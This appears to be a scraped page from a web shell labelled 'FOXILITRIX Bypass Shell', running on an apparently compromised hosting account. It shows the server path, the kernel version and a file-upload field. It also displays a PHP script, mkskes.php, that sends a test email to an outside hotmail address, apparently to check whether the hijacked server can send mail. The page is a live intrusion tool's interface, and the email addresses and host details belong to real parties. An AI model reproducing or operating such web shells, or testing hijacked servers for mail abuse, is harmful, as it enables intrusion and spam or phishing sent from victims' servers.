FOXILITRIX Bypass Shell

echo"
FOXILITRIX
";
Current Path : /home/baheco/public_html/img/

Linux sd-1582531-l.dattaweb.com 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/baheco/public_html/img/mkskes.php

<?php 
    ini_set( 'display_errors', 1 );
    error_reporting( E_ALL );
    $from = "info@microrelats.com";
    $to = "pikosfitrix@hotmail.com";
    $subject = "PHP Mail Test script";
    $message = "This is a test to check the PHP Mail functionality";
    $headers = "From:" . $from;
    mail($to,$subject,$message, $headers);
    echo "Test email sent";
?>

bypass 1.0